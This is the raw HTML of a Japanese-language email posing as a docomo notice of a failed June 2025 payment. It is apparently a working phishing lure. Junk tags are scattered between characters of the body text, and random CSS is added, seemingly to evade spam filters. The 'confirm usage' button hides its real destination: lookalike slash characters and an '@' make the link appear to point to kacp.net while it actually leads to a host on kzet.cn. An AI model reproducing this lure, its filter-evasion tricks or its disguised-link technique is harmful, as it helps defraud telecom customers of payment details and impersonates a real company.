ドコモの請求に関する支払い情報MQ=7351273700913
<html lang=ja xmlns="http://www.w3.org/1999/xhtml"><head><title>[PR]ダプモシツシぷもはぃ</title><meta content=ja http-equiv=Content-Language><meta content="text/html; charset=utf-8" http-equiv=Content-Type><meta content=text/css http-equiv=Content-Style-Type><style type=text/css><style> body { font-family: 'Meiryo', 'Hiragino Kaku Gothic Pro', sans-serif; line-height: 1.6; color: #333; max-width: 600px; margin: 0 auto; padding: 20px; } .header { color: #d62027; font-size: 18px; font-weight: bold; margin-bottom: 20px; border-bottom: 2px solid #d62027; padding-bottom: 5px; } .payment-notice { background-color: #f8f9fa; padding: 15px; border-radius: 5px; margin: 15px 0; } .payment-methods { background-color: #fff8e6; padding: 15px; border-radius: 5px; margin: 15px 0; } .button { display: inline-block; background-color: #d62027; color: white; padding: 12px 24px; text-decoration: none; border-radius: 4px; margin: 15px 0; font-weight: bold; } .note { font-size: 13px; color: #666; margin: 15px 0; } .contact { margin-top: 20px; padding-top: 15px; border-top: 1px solid #eee; } .footer { font-size: 12px; color: #777; margin-top: 30px; border-top: 1px solid #eee; padding-top: 15px; } </style><style>#lhtjtguhlbc #Jlhatvpg-Fkwcz-Gxqvnmg .Zdqemdkty .spf-eanzwduuf #Fhcp-Uur .czdemdfeapthgieiw #qJkBJvOVVR-PfkwZNY-HaXuE #Hymxiccmk-Pmcihhfcy-Bweo {line-height:normal;box-sizing:content-box;}</style><style>
#Exqhah-Uiuyn-Idumhao .iSoFnrbAhBc #Mjgxmjptnk-Bneogkn-Nmltralhhu .uQa-NIwSNuqUak .UfBtkBcGDT-eqY-QEIKhGy .ubcvrvq #waqfhyiful-lluckndti #iklyuw-jrz #ymkfihzrh-qitgh-ramnpi {
border-bottom-left-radius:1em;
text-align:left;
}
</style><style>
#Dlj-Hmb-Ozejuabu .uwzypdfqroeuygp #myPlO-bqgP-LbvzK .Nuzcvjdj #Evenjov .xhakhzothgilbjnhjy {
clear:none;
line-height:normal;
}
</style></head><body><div class=header>docomo料金のお支払いについて</div><div>いつもdocomoをご利用いただきありがとうございます。<br>この<vywlizx>た</vywlizx>び<yastki>、</yastki>【お<aekrbkc>客</aekrbkc>様<wed>番</wed>号<inuhljc>】</inuhljc>様の<zuanepwr>【</zuanepwr>2<ookpduo>0</ookpduo>25<idth>年</idth>06月<sfzc>】</sfzc>分<rthkxawy>の</rthkxawy>料金の<fwh>お</fwh>支払<yxrn>い</yxrn>が正常<uyugms>に</uyugms>完了し<kxolw>な</kxolw>か<cfftrvt>っ</cfftrvt>たこと<xanzthhp>を</xanzthhp>お<xvndl>知</xvndl>らせい<mdgqkk>た</mdgqkk>し<vsmtg>ま</vsmtg>す。</div><div class=payment-notice><div>大変お手数ですが、以下の方法にて再度お支払い手続きをお願いいたします。</div></div><div class=payment-methods><div><strong>お支払い方法</strong></div><ul> <li>docomoアプリまたはMy docomoからクレジットカードでお支払い <li>コンビニエンスストアでのお支払い <li>銀行ATMまたはネットバンキングでのお支払い </li></ul></div><a class=button href="https://kacp.net∕hpnyr∕kppxyusu∕acewsmbbd∕uvlbskkyjt∕zisklaeye∕xssmys∕rpgnjyxsyo@kzet.cn/">ご利用確認はこちら</a> <div class=note><div>※既にお支払い済みの場合は、本メッセージを無視していただいて結構です。</div></div><div class=contact><div>docomoカスタマーセンター:0120-800-000<br>受付時間:9:00~20:00(年中無休</div></div><div class=footer><div>※本メールは送信専用です。返信いただいてもご回答できませんのでご了承ください。</div><div>ご不便とご心配をおかけしまして誠に申し訳ございませんが、<BR>何とぞご理解賜りたくお願い申しあげます。</div></div><br><br></body></html>